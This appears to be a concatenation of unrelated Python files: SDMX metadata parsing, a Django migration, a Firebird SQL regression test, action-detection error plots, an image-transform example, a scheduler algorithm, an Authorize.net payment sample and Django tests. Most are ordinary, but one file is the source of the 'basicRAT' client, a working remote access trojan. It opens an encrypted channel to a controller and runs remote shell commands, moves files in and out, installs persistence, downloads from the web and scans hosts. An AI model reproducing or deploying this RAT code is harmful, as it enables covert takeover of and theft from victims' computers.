for element in json_cons[DATA_KEY_SET]:
list_keys = []
element[KEY] = add_list(element[KEY])
for e in element[KEY]:
list_keys.append(format_key_set(e))
json_cons[DATA_KEY_SET_LOW].append(DataKeySet(keys=list_keys,
isIncluded=element[
INCLUDED]))
del json_cons[DATA_KEY_SET]
if CUBE_REGION in json_cons:
json_cons[CUBE_REGION] = add_list(json_cons[CUBE_REGION])
cubes = []
for element in json_cons[CUBE_REGION]:
is_included = element[INCLUDE]
keys = format_key_set(element)
members = []
for e in keys:
members.append(MemberSelection(is_included,
values_for=e,
sel_value=keys[e]))
cubes.append(CubeRegion(is_included=is_included, member=members))
json_cons[CONTENT_REGION] = cubes
del json_cons[CUBE_REGION]
return json_cons
def create_constraints(json_cons):
elements = {}
if CON_CONS in json_cons:
json_cons[CON_CONS] = add_list(json_cons[CON_CONS])
for element in json_cons[CON_CONS]:
attachment = None
references = []
if XMLNS in element:
del element[XMLNS]
element = format_annotations(element)
element = format_name_description(element)
full_id = unique_id(element[AGENCY_ID],
element[ID],
element[VERSION])
element = format_urls(element)
element = format_maintainer(element)
element = format_id(element)
if CONS_ATT in element:
if DSD in element[CONS_ATT]:
agency_id = element[CONS_ATT][DSD][REF][AGENCY_ID]
id_ = element[CONS_ATT][DSD][REF][ID]
version = element[CONS_ATT][DSD][REF][VERSION]
str_id = unique_id(agency_id, id_, version)
references = [str_id, DSD]
if str_id in datastructures:
attachment = datastructures[str_id]
elif DF in element[CONS_ATT]:
agency_id = element[CONS_ATT][DF][REF][AGENCY_ID]
id_ = element[CONS_ATT][DF][REF][ID]
version = element[CONS_ATT][DF][REF][VERSION]
str_id = unique_id(agency_id, id_, version)
references = [str_id, DF]
if str_id in dataflows:
attachment = dataflows[str_id]
del element[CONS_ATT]
if TYPE in element:
element[ROLE.lower()] = element.pop(TYPE)
element = format_restrictions(element)
# Creation of Constraint
if full_id not in elements:
elements[full_id] = ContentConstraint(**element)
else:
raise Exception
if attachment is not None:
attachment.add_constraint(elements[full_id])
del attachment
# TODO Delete once we change constraints
if len(references) > 0:
elements[full_id]._ref_attach = references[0]
elements[full_id]._type_attach = references[1]
return elements
def grouping_errors():
if len(missing_rep["CS"]) > 0:
for e in missing_rep["CS"]:
errors.append({'Code': 'MS07', 'ErrorLevel': 'CRITICAL',
'ObjectID': f'{e}',
'ObjectType': 'Concept',
'Message': f'Missing Concept Scheme {e}'}
)
missing_rep["CS"].clear()
if len(missing_rep["CL"]) > 0:
for e in missing_rep["CL"]:
errors.append({'Code': 'MS02', 'ErrorLevel': 'CRITICAL',
'ObjectID': f'{e}',
'ObjectType': 'Codelist',
'Message': f'Missing Codelist {e}'})
missing_rep["CL"].clear()
if len(missing_rep["CON"]) > 0:
for e in missing_rep["CON"]:
errors.append({'Code': 'MS03', 'ErrorLevel': 'CRITICAL',
'ObjectID': f'{e}',
'ObjectType': 'Concept',
'Message': f'Missing Concept {e}'})
missing_rep["CON"].clear()
def create_metadata(json_meta):
"""
Metadata validations stands for the next schema:
.. list-table:: Metadata validations
:widths: 20 80
:header-rows: 1
* - Code
- Description
* - MS01
- Check that the metadata file contains at least one DSD
* - MS02
- Check that the metadata file contains related codelists
* - MS03
- Check if the DSD metadata file contains the concepts needed \
for each DSD
* - MS04
- Check if the dimensions in Attribute Relationship are in \
DimensionList in DSD file
* - MS05
- Check if the primary measure in Attribute Relationship is in
MeasureList in DSD file
* - MS06
- Check if all DSDs present in the metadata file are unique
* - MS07
- Check if all Concept Scheme needed are present
* - MX01
- Check if minimum structural requirements for DSD xml are \
satisfied
* - MX02
- Check if every DSD has primary measure defined
"""
# Reset dict to store metadata
metadata = dict()
if ORGS in json_meta:
metadata[ORGS] = create_organisations(json_meta[ORGS])
if CODELISTS in json_meta:
metadata[CODELISTS] = create_scheme(json_meta[CODELISTS], CL, CODE)
codelists.update(metadata[CODELISTS])
if CONCEPTS in json_meta:
metadata[CONCEPTS] = create_scheme(json_meta[CONCEPTS], CS, CON)
concepts.update(metadata[CONCEPTS])
if DSDS in json_meta:
metadata[DSDS] = create_datastructures(json_meta[DSDS])
datastructures.update(metadata[DSDS])
if DATAFLOWS in json_meta:
metadata[DATAFLOWS] = create_dataflows(json_meta[DATAFLOWS])
dataflows.update(metadata[DATAFLOWS])
if CONSTRAINTS in json_meta:
metadata[CONSTRAINTS] = create_constraints(json_meta[CONSTRAINTS])
grouping_errors()
metadata['errors'] = copy.copy(errors)
# Reset global variables
agencies.clear()
concepts.clear()
codelists.clear()
datastructures.clear()
dataflows.clear()
errors.clear()
return metadata
|
# Generated by Django 3.2.6 on 2021-10-09 00:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('vmmanager', '0008_auto_20211008_0224'),
]
operations = [
migrations.AddField(
model_name='virtualmachine',
name='state',
field=models.CharField(choices=[('CREATING', 'Creating'), ('AVAILABLE', 'Available'), ('TERMINATING', 'Terminating'), ('TERMINATED', 'Terminated'), ('ERROR', 'Error')], default='CREATING', max_length=16),
),
]
|
#coding:utf-8
#
# id: bugs.core_5367
# title: Regression: (boolean) parameters as search condition no longer allowed
# decription:
# Confirmed on WI-T4.0.0.397 before commit 04-oct-2016 17:52
# https://github.com/FirebirdSQL/firebird/commit/8a4b7e3b79a31dc7bf6e569e6cf673cf6899a475
# - got:
# Statement failed, SQLSTATE = 22000
# Dynamic SQL Error
# -SQL error code = -104
# -Invalid usage of boolean expression
#
# Works fine since that commit (checked on LI-T4.0.0.397).
#
# tracker_id: CORE-5367
# min_versions: ['3.0.2']
# versions: 3.0.2
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0.2
# resources: None
substitutions_1 = []
init_script_1 = """
recreate table test(id int,boo boolean);
"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """
set sqlda_display on;
set planonly;
select * from test where ?;
set planonly;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
INPUT message field count: 1
01: sqltype: 32764 BOOLEAN scale: 0 subtype: 0 len: 1
: name: alias:
: table: owner:
PLAN (TEST NATURAL)
OUTPUT message field count: 2
01: sqltype: 496 LONG Nullable scale: 0 subtype: 0 len: 4
: name: ID alias: ID
: table: TEST owner: SYSDBA
02: sqltype: 32764 BOOLEAN Nullable scale: 0 subtype: 0 len: 1
: name: BOO alias: BOO
: table: TEST owner: SYSDBA
"""
@pytest.mark.version('>=3.0.2')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_stdout == act_1.clean_expected_stdout
|
from action_detector_diagnosis import ActionDetectorDiagnosis
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
import numpy as np
import pandas as pd
import os
from collections import OrderedDict
from matplotlib import gridspec, rc
import matplotlib as mpl
import matplotlib.font_manager
mpl.use('Agg')
params = {'font.family': 'serif','font.serif': 'Times',
'text.usetex': True,
'xtick.major.size': 8,
'ytick.major.size': 8,
'xtick.major.width': 3,
'ytick.major.width': 3,
'mathtext.fontset': 'custom',
}
mpl.rcParams.update(params)
import matplotlib.pyplot as plt
def split_predictions_by_score_ranges(fp_error_analysis, groups):
ground_truth = fp_error_analysis.ground_truth
prediction = fp_error_analysis.prediction
ground_truth_gbvn = ground_truth.groupby('label')
prediction = prediction.sort_values(by='score', ascending=False).reset_index(drop=True)
prediction_gbvn = prediction.groupby('label')
filtered_prediction_df_list = {}
for g in range(groups):
filtered_prediction_df_list[g] = []
for label, this_ground_truth in ground_truth_gbvn:
try:
# Check if there is at least one prediction for this class.
this_prediction = prediction_gbvn.get_group(label).reset_index(drop=True)
except Exception as e:
print('label %s is missing from prediciton' % label)
continue
index = 0
n_j = len(np.unique(this_ground_truth['gt-id']))
max_index = len(this_prediction)
for g in range(groups):
# pick the top (len(this_ground_truth)*self.limit_factor) predictions
filtered_prediction_df_list[g] += [this_prediction.iloc[index:min(index+n_j,max_index)]]
index += n_j
if (index >= max_index):
continue
filtered_prediction = {}
fp_error_types_count = {}
fp_error_types_count_df = {}
fp_error_types_precentage_df = {}
fp_error_types_legned = {'True Positive': 0,
'Double Detection Err': 1,
'Wrong Label Err': 2,
'Localization Err': 3,
'Confusion Err': 4,
'Background Err': 5}
fp_error_types_inverse_legned = dict([(v, k) for k, v in fp_error_types_legned.items()])
for g in range(groups):
filtered_prediction[g] = pd.concat(filtered_prediction_df_list[g], ignore_index=True)
for col_name, tiou in zip(fp_error_analysis.fp_error_type_cols, fp_error_analysis.tiou_thresholds):
fp_error_types_count[tiou] = dict(zip(fp_error_types_legned.keys(), [0]*len(fp_error_types_legned)))
error_ids, counts = np.unique(filtered_prediction[g][col_name], return_counts=True)
for error_id,count in zip(error_ids, counts):
fp_error_types_count[tiou][fp_error_types_inverse_legned[error_id]] = count
fp_error_types_count_df[g] = pd.DataFrame(fp_error_types_count)
fp_error_types_count_df[g]['avg'] = fp_error_types_count_df[g].mean(axis=1)
fp_error_types_precentage_df[g] = fp_error_types_count_df[g]/len(filtered_prediction[g])
return filtered_prediction, fp_error_types_count_df, fp_error_types_precentage_df
def subplot_fp_profile(fig, ax, values, labels, colors, xticks, xlabel, ylabel, title,
fontsize=14, bottom=0, top=100, bar_width=1, spacing=0.85,
grid_color='gray', grid_linestyle=':', grid_lw=1,
ncol=1, legend_loc='best'):
ax.yaxis.grid(color=grid_color, linestyle=grid_linestyle, lw=grid_lw)
cumsum_values = np.cumsum(np.array(values)*100, axis=1)
index = np.linspace(0, spacing*bar_width*len(values),len(values))
for i in range(cumsum_values.shape[1])[::-1]:
rects1 = ax.bar(index, cumsum_values[:,i], bar_width,
capsize = i,
color=colors[i],
label=xticks[i], zorder=0)
lgd = ax.legend(loc=legend_loc, ncol=ncol, fontsize=fontsize/1.2, edgecolor='k')
ax.set_ylabel(ylabel, fontsize=fontsize)
ax.set_xlabel(xlabel, fontsize=fontsize)
plt.setp(ax.get_yticklabels(), fontsize=fontsize/1.2)
plt.xticks(np.array(index), np.array(labels[:len(values)]), fontsize=fontsize/1.2, rotation=90)
plt.yticks(np.linspace(0,1,11)*100, fontsize=fontsize/1.2 )
ax.set_ylim(bottom=bottom, top=top)
ax.set_xlim(left=index[0]-1.25*bar_width, right=index[-1]+1.0*bar_width)
ax.set_title(title, fontsize=fontsize)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.yaxis.grid(True, linestyle='dotted')
ax.set_axisbelow(True)
ax.yaxis.set_tick_params(size=10, direction='in', width=2)
for axis in ['bottom','left']:
ax.spines[axis].set_linewidth(2.5)
return lgd
def subplot_error_type_impact(fig, ax, values, labels, colors, xlabel, ylabel, title,
fontsize=14, bottom=0, top=100, bar_width=1, spacing=1.1,
grid_color='gray', grid_linestyle=':', grid_lw=1):
ax.yaxis.grid(color=grid_color, linestyle=grid_linestyle, lw=grid_lw)
index = np.linspace(0, spacing*(len(values)+1),1)
for i in range(len(values)):
rects1 = ax.bar(index + i*spacing*bar_width, values[i]*100, bar_width,
capsize = i,
color=colors[i],
label=labels[i])
for bari in rects1:
height = bari.get_height()
plt.gca().text(bari.get_x() + bari.get_width()/2, bari.get_height()+0.001*100, '%.1f' % height,
ha='center', color='black', fontsize=fontsize/1.1)
ax.set_ylabel(ylabel, fontsize=fontsize)
ax.set_xlabel(xlabel, fontsize=fontsize)
plt.xticks([])
plt.yticks(fontsize=fontsize/1.2)
ax.set_ylim(bottom=bottom,top=top)
ax.set_title(title, fontsize=fontsize)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.yaxis.grid(True, linestyle='dotted')
ax.set_axisbelow(True)
ax.yaxis.set_tick_params(size=10, direction='in', width=2)
for axis in ['bottom','left']:
ax.spines[axis].set_linewidth(2.5)
def plot_fp_analysis(fp_error_analysis, save_filename,
colors=['#33a02c','#b2df8a','#1f78b4','#fb9a99','#e31a1c','#a6cee3'],
error_names=['True Positive', 'Double Detection Err','Wrong Label Err', 'Localization Err', 'Confusion Err', 'Background Err'],
figsize=(10,4.42), fontsize=24):
values,labels = [],[]
_, _, fp_error_types_precentage_df = split_predictions_by_score_ranges(fp_error_analysis,fp_error_analysis.limit_factor)
for this_limit_factor, this_fp_error_types_precentage_df in fp_error_types_precentage_df.items():
values+=[[this_fp_error_types_precentage_df['avg'][k] for k in error_names]]
labels+=['$%dG$' % (this_limit_factor+1)]
fig = plt.figure(figsize=figsize)
grid = plt.GridSpec(1, 5, wspace=1.75, right=1.00)
lgd = subplot_fp_profile(fig=fig, ax=fig.add_subplot(grid[:-2]),
values=values, labels=labels, colors=colors,
xticks=error_names,
xlabel='Top Predictions', ylabel='Error Breakdown ($\%$)',
title='False Positive Profile', fontsize=fontsize,
ncol=3, legend_loc=(-0.15,1.15))
subplot_error_type_impact(fig=fig, ax=fig.add_subplot(grid[-2:]),
values=list(fp_error_analysis.average_mAP_gain.values()),
labels=list(fp_error_analysis.average_mAP_gain.keys()),
colors=colors[1:],
xlabel='Error Type', ylabel='Average-mAP$_N$\nImprovment $(\%)$',
title='Removing Error Impact', fontsize=fontsize,
top=np.ceil(np.max(list(fp_error_analysis.average_mAP_gain.values()))*100*1.1))
fig.savefig(save_filename, bbox_extra_artists=(lgd,), bbox_inches='tight')
print('[Done] Output analysis is saved in %s' % save_filename)
def main(ground_truth_filename, prediction_filename, output_folder):
os.makedirs(output_folder, exist_ok=True)
# characteristic_names_to_bins = {'context-size': (range(-1,7), ['0','1','2','3','4','5','6']),
# 'context-distance': (range(-1,4), ['Inf','N','M','F']),
# 'agreement': (np.linspace(0,1.0,6), ['XW','W','M','H','XH']),
# 'coverage': (np.linspace(0,1.0,6), ['XS','S','M','L','XL']),
# 'length': (np.array([0,30,60,120,180,np.inf]), ['XS','S','M','L','XL']),
# 'num-instances': (np.array([-1,1,4,8,np.inf]), ['XS','S','M','L'])}
# tiou_thresholds = np.linspace(0.5, 0.95, 10)
fp_error_analysis = ActionDetectorDiagnosis(ground_truth_filename=ground_truth_filename,
prediction_filename=prediction_filename,
tiou_thresholds=[0.5],
limit_factor=10,
min_tiou_thr=0.1,
verbose=True,
load_extra_annotations=False,
characteristic_names_to_bins={},
normalize_ap=False,
minimum_normalized_precision_threshold_for_detection=0.0
)
fp_error_analysis.evaluate()
fp_error_analysis.diagnose()
plot_fp_analysis(fp_error_analysis=fp_error_analysis,
save_filename=os.path.join(output_folder,'false_positive_analysis.pdf'))
if __name__ == '__main__':
parser = ArgumentParser(description='Run the false positive error analysis.',
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('--ground_truth_filename', required=True, type=str,
help='The path to the JSON file containing the ground truth annotations')
parser.add_argument('--prediction_filename', required=True, type=str,
help='The path to the JSON file containing the method\'s predictions')
parser.add_argument('--output_folder', required=True, type=str,
help='The path to the folder in which the results will be saved')
args = parser.parse_args()
main(args.ground_truth_filename, args.prediction_filename, args.output_folder)
|
"""
===============================
Using geometric transformations
===============================
This example illustrates use of geometric transformations in the context of
image processing.
"""
import math
import numpy as np
import matplotlib.pyplot as plt
from skimage import data
from skipp import transform
######################################################################
# Basics
# ======
#
# Affine geometric transformation is supported.
#
# Geometric transformations can either be created using the explicit
# parameters (e.g. scale, shear, rotation and translation) or the
# transformation matrix.
#
# Create a transformation using explicit parameters:
tform = transform.AffineTransform(scale=1, rotation=math.pi/2,
translation=(0, 1))
print(tform.params)
######################################################################
# Alternatively, define through a transformation matrix:
# itself:
matrix = tform.params.copy()
matrix[1, 2] = 2
tform2 = transform.AffineTransform(matrix)
######################################################################
# Image warping
# =============
#
# Geometric transformations can also be used to warp images:
text = data.text()
tform = transform.AffineTransform(scale=1, rotation=math.pi/4,
translation=(text.shape[0]/2, -100))
rotated = transform.warp(text, tform)
fig, ax = plt.subplots(nrows=2)
ax[0].imshow(text, cmap=plt.cm.gray)
ax[1].imshow(rotated, cmap=plt.cm.gray)
for a in ax:
a.axis('off')
plt.tight_layout()
plt.show()
|
from abc import abstractmethod
from resultado import Resultado
import pandas as pd
from sklearn.base import ClassifierMixin, RegressorMixin
from typing import List,Union
class MetodoAprendizadoDeMaquina:
@abstractmethod
def eval(self,df_treino:pd.DataFrame, df_data_to_predict:pd.DataFrame, col_classe:str) -> Resultado:
raise NotImplementedError
class ScikitLearnAprendizadoDeMaquina(MetodoAprendizadoDeMaquina):
#Dica: Union é usado quando um parametro pode receber mais de um tipo
#neste caso, ml_method é um ClassifierMixin ou RegressorMixin
#essas duas classes são superclasses dos classficadores e métodos de regressão
def __init__(self,ml_method:Union[ClassifierMixin,RegressorMixin]):
self.ml_method = ml_method
def eval(self, df_treino:pd.DataFrame, df_data_to_predict:pd.DataFrame, col_classe:str, seed:int=1) -> Resultado:
#Atividade 2: Implementação da classe eval - veja passo a passo
#a partir de self.df_treino, separe os atributos da classe
#x_treino deverá ser um dataframe que possua apenas as colunas dos atributos (use o método drop com o parametro axis)
#y_treino deverá possuir apenas os valores coluna da classe
x_treino = df_treino.drop([col_classe],axis = 1)
y_treino = df_treino[[col_classe]]
#execute o método fit de ml_method e crie o modelo
model = self.ml_method.fit(x_treino,y_treino)
#faça a mesma separação que fizemos em x_treino e y_treino nos dados a serem previstos
x_to_predict = df_data_to_predict.drop([col_classe],axis = 1)
y_to_predict = df_data_to_predict[col_classe].to_numpy()
#Impressao do x e y para testes
#print("X_treino: "+str(x_treino))
#print("y_treino: "+str(y_treino))
#print("X_to_predict: "+str(x_to_predict))
#print("y_to_predict: "+str(y_to_predict))
#retorne o resultado por meio do método predict
y_predictions = model.predict(x_to_predict)
return Resultado(y_to_predict,y_predictions)
|
# Copyright (c) 2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Dict, List, Tuple
from wca.logger import TRACE
from wca.metrics import Metric, MetricType
from wca.scheduler.algorithms.base import get_requested_fraction, DEFAULT_DIMENSIONS
from wca.scheduler.algorithms.fit import Fit
from wca.scheduler.data_providers import DataProvider
from wca.scheduler.metrics import MetricName
from wca.scheduler.types import ResourceType
log = logging.getLogger(__name__)
def calculate_variance(app_name, node_name: str, requested_fraction: Dict[ResourceType, float],
bar_weights: Dict[ResourceType, float]) -> \
Tuple[float, List[Metric]]:
"""Return variance using bar_weights"""
# Mean - priority according to variance of dimensions
metrics = []
mean = sum([v for v in requested_fraction.values()]) / len(requested_fraction)
log.log(TRACE, "[Prioritize][app=%s][node=%s][bar] Mean: %s", app_name, node_name, mean)
metrics.append(
Metric(name=MetricName.BAR_MEAN,
value=mean, labels=dict(app=app_name, node=node_name),
type=MetricType.GAUGE))
# Variance
if len(requested_fraction) > 2:
variance = sum([((fraction - mean) * (fraction - mean)) * bar_weights.get(rt, 1)
for rt, fraction in requested_fraction.items()]) \
/ len(requested_fraction)
elif len(requested_fraction) == 2:
values = list(requested_fraction.values())
variance = abs(values[0] - values[1])
else:
variance = 0
log.log(TRACE,
"[Prioritize][app=%s][node=%s][bar] "
"Variance(weighted quadratic sum of requested_fraction-mean): %s",
app_name, node_name, variance)
metrics.append(
Metric(name=MetricName.BAR_VARIANCE,
value=variance, labels=dict(app=app_name, node=node_name),
type=MetricType.GAUGE))
return variance, metrics
class BAR(Fit):
def __init__(self,
data_provider: DataProvider,
dimensions: List[ResourceType] = DEFAULT_DIMENSIONS,
bar_weights: Dict[ResourceType, float] = None,
alias=None,
max_node_score: float = 10.,
):
Fit.__init__(self, data_provider, dimensions, alias=alias, max_node_score=max_node_score)
self.bar_weights = bar_weights or {}
def priority_for_node(self, node_name, app_name, data_provider_queried) -> float:
""" Return priority for node_name for app_name according data from data_provider.
Priority is based on variance of fraction of requested resources.
"""
nodes_capacities, assigned_apps, apps_spec, _ = data_provider_queried
requested_fraction, metrics = get_requested_fraction(
app_name, apps_spec, assigned_apps, node_name, nodes_capacities, self.dimensions)
self.metrics.extend(metrics)
variance, metrics = calculate_variance(
app_name, node_name, requested_fraction, self.bar_weights)
self.metrics.extend(metrics)
bar_score = (1.0 - variance)
log.debug("[Prioritize][app=%s][node=%s][bar] Bar score: %s", app_name, node_name,
bar_score)
self.metrics.add(
Metric(name=MetricName.BAR_SCORE,
value=bar_score, labels=dict(app=app_name, node=node_name),
type=MetricType.GAUGE))
return bar_score
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# basicRAT client
# https://github.com/vesche/basicRAT
#
import socket
import subprocess
import struct
import sys
from core import common
from core import crypto
from core import filesock
from core import persistence
from core import scan
from core import survey
from core import toolkit
PLAT_TYPE = sys.platform
HOST = 'localhost'
PORT = 1337
FB_KEY = '82e672ae054aa4de6f042c888111686a'
# generate your own key with...
# python -c "import binascii, os; print(binascii.hexlify(os.urandom(16)))"
def main():
s = socket.socket()
s.connect((HOST, PORT))
dh_key = crypto.diffiehellman(s)
GCM = crypto.AES_GCM(dh_key)
IV = 0
s.setblocking(0)
while True:
#data = s.recv(1024)
#data = crypto.AES_decrypt(data, dh_key)
data = crypto.recvGCM(s, GCM)
IV += 1
if not data:
continue
# seperate prompt into command and action
cmd, _, action = data.partition(' ')
# stop client
if cmd == 'kill':
s.close()
sys.exit(0)
# run command
elif cmd == 'execute':
results = subprocess.Popen(action, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
crypto.sendGCM(s, GCM, IV, results)
# send file
elif cmd == 'download':
for fname in action.split():
fname = fname.strip()
filesock.sendfile(s, GCM, fname)
# receive file
elif cmd == 'upload':
for fname in action.split():
fname = fname.strip()
filesock.recvfile(s, GCM, IV, fname)
# regenerate DH key
elif cmd == 'rekey':
dh_key = crypto.diffiehellman(s)
# apply persistence mechanism
elif cmd == 'persistence':
results = persistence.run(PLAT_TYPE)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# download a file from the web
elif cmd == 'wget':
results = toolkit.wget(action)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# unzip a file
elif cmd == 'unzip':
results = toolkit.unzip(action)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# run system survey
elif cmd == 'survey':
results = survey.run(PLAT_TYPE)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# run a scan
elif cmd == 'scan':
results = scan.single_host(action)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
if __name__ == '__main__':
main()
|
import os, sys
import imp
import time
from authorizenet import apicontractsv1
from authorizenet.apicontrollers import *
constants = imp.load_source('modulename', 'constants.py')
from decimal import *
def create_an_accept_payment_transaction(amount):
# Create a merchantAuthenticationType object with authentication details
# retrieved from the constants file
merchantAuth = apicontractsv1.merchantAuthenticationType()
merchantAuth.name = constants.apiLoginId
merchantAuth.transactionKey = constants.transactionKey
# Set the transaction's refId
refId = "ref {}".format(time.time())
# Create the payment object for a payment nonce
opaqueData = apicontractsv1.opaqueDataType()
opaqueData.dataDescriptor = "COMMON.ACCEPT.INAPP.PAYMENT"
opaqueData.dataValue = "119eyJjb2RlIjoiNTBfMl8wNjAwMDUyN0JEODE4RjQxOUEyRjhGQkIxMkY0MzdGQjAxQUIwRTY2NjhFNEFCN0VENzE4NTUwMjlGRUU0M0JFMENERUIwQzM2M0ExOUEwMDAzNzlGRDNFMjBCODJEMDFCQjkyNEJDIiwidG9rZW4iOiI5NDkwMjMyMTAyOTQwOTk5NDA0NjAzIiwidiI6IjEuMSJ9"
# Add the payment data to a paymentType object
paymentOne = apicontractsv1.paymentType()
paymentOne.opaqueData = opaqueData
# Create order information
order = apicontractsv1.orderType()
order.invoiceNumber = "10101"
order.description = "Golf Shirts"
# Set the customer's Bill To address
customerAddress = apicontractsv1.customerAddressType()
customerAddress.firstName = "Ellen"
customerAddress.lastName = "Johnson"
customerAddress.company = "Souveniropolis"
customerAddress.address = "14 Main Street"
customerAddress.city = "Pecan Springs"
customerAddress.state = "TX"
customerAddress.zip = "44628"
customerAddress.country = "USA"
# Set the customer's identifying information
customerData = apicontractsv1.customerDataType()
customerData.type = "individual"
customerData.id = "99999456654"
customerData.email = "EllenJohnson@example.com"
# Add values for transaction settings
duplicateWindowSetting = apicontractsv1.settingType()
duplicateWindowSetting.settingName = "duplicateWindow"
duplicateWindowSetting.settingValue = "600"
settings = apicontractsv1.ArrayOfSetting()
settings.setting.append(duplicateWindowSetting)
# Create a transactionRequestType object and add the previous objects to it
transactionrequest = apicontractsv1.transactionRequestType()
transactionrequest.transactionType = "authCaptureTransaction"
transactionrequest.amount = amount
transactionrequest.order = order
transactionrequest.payment = paymentOne
transactionrequest.billTo = customerAddress
transactionrequest.customer = customerData
transactionrequest.transactionSettings = settings
# Assemble the complete transaction request
createtransactionrequest = apicontractsv1.createTransactionRequest()
createtransactionrequest.merchantAuthentication = merchantAuth
createtransactionrequest.refId = refId
createtransactionrequest.transactionRequest = transactionrequest
# Create the controller and get response
createtransactioncontroller = createTransactionController(createtransactionrequest)
createtransactioncontroller.execute()
response = createtransactioncontroller.getresponse()
if response is not None:
# Check to see if the API request was successfully received and acted upon
if response.messages.resultCode == "Ok":
# Since the API request was successful, look for a transaction response
# and parse it to display the results of authorizing the card
if hasattr(response.transactionResponse, 'messages') == True:
print ('Successfully created transaction with Transaction ID: %s' % response.transactionResponse.transId)
print ('Transaction Response Code: %s' % response.transactionResponse.responseCode)
print ('Message Code: %s' % response.transactionResponse.messages.message[0].code)
print ('Auth Code: %s' % response.transactionResponse.authCode)
print ('Description: %s' % response.transactionResponse.messages.message[0].description)
else:
print ('Failed Transaction.')
if hasattr(response.transactionResponse, 'errors') == True:
print ('Error Code: %s' % str(response.transactionResponse.errors.error[0].errorCode))
print ('Error Message: %s' % response.transactionResponse.errors.error[0].errorText)
# Or, print errors if the API request wasn't successful
else:
print ('Failed Transaction.')
if hasattr(response, 'transactionResponse') == True and hasattr(response.transactionResponse, 'errors') == True:
print ('Error Code: %s' % str(response.transactionResponse.errors.error[0].errorCode))
print ('Error Message: %s' % response.transactionResponse.errors.error[0].errorText)
else:
print ('Error Code: %s' % response.messages.message[0]['code'].text)
print ('Error Message: %s' % response.messages.message[0]['text'].text)
else:
print ('Null Response.')
return response
if(os.path.basename(__file__) == os.path.basename(sys.argv[0])):
create_an_accept_payment_transaction(constants.amount)
|
import pytest
from django.core.files.base import ContentFile
from core.models import UL_ORG_ADMIN
from organizations.models import Organization
from publications.models import Platform
from sushi.models import SushiFetchAttempt, SushiCredentials
@pytest.mark.django_db
class TestFileName:
""" Test class for checking whether setting the file name
work as expected
"""
@pytest.mark.parametrize(
('internal_id', 'platform_name', 'version', 'code', 'ext'),
(
('internal1', 'platform_1', 5, 'TR', 'json'),
(None, 'platform_2', 5, 'TR', 'json'),
(None, 'platform_1', 4, 'JR1', 'tsv'),
('internal2', 'platform_1', 4, 'JR1', 'tsv'),
),
)
def test_file_name(
self, counter_report_type_named, internal_id, platform_name, version, code, ext,
):
counter_report_type = counter_report_type_named(code, version)
platform = Platform.objects.create(short_name=platform_name, name=platform_name, ext_id=10)
organization = Organization.objects.create(
# ext_id=1,
# parent=None,
internal_id=internal_id,
# ico='123',
# name_cs='AAA',
# name_en='AAA',
# short_name='AA',
)
credentials = SushiCredentials.objects.create(
organization=organization,
platform=platform,
counter_version=version,
lock_level=UL_ORG_ADMIN,
url='http://a.b.c/',
)
data_file = ContentFile("b")
data_file.name = f"report.{ext}"
fetch_attempt = SushiFetchAttempt.objects.create(
credentials=credentials,
counter_report=counter_report_type,
start_date="2020-01-01",
end_date="2020-02-01",
data_file=data_file,
credentials_version_hash=credentials.compute_version_hash(),
)
assert fetch_attempt.data_file.name.startswith(
f"counter/{internal_id or organization.pk}/{ platform_name }/{ version }_{code}"
)
@pytest.mark.django_db
class TestSushiFetchAttemptModelManager(object):
def test_custom_manager_methods_exist(self):
"""
Test that custom manager methods exist at all
"""
SushiFetchAttempt.objects.all()
SushiFetchAttempt.objects.current()
SushiFetchAttempt.objects.current_or_successful()
def test_custom_manager_methods_exist_on_queryset(self):
"""
Test that custom manager methods are also available on querysets for SushiFetchAttempts
"""
SushiFetchAttempt.objects.filter(download_success=True).current()
SushiFetchAttempt.objects.filter(download_success=True).current_or_successful()
|
import numpy as np
from src.settings import gridsize
from src.util import fullcols, colsr, colsc
class convert_coords:
"""
Converts tkinter canvas coordinates to pandas grid coordinates, and vice versa.
"""
def __init__(self, gridsize, boardsize) -> None:
self.gridsize = gridsize
self.boardsize = boardsize
def convert_logical_to_grid_position(self, logical_position):
logical_position = np.array(logical_position, dtype=int)
return (self.boardsize / self.gridsize) * logical_position + self.boardsize / (self.gridsize * 2)
def convert_grid_to_logical_position(self, grid_position):
grid_position = np.array(grid_position)
return np.array(grid_position // (self.boardsize / self.gridsize), dtype=int)
def convert_logical_to_map(self, logical_postion):
alp = [i for i in logical_postion]
letter = colsr().get(alp[0])
map_position = (alp[1], letter)
return map_position
def convert_map_to_logical(self, map_position):
number = colsc().get(map_position[1])
log_pos = np.array([number, map_position[0]], dtype=int)
return log_pos |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.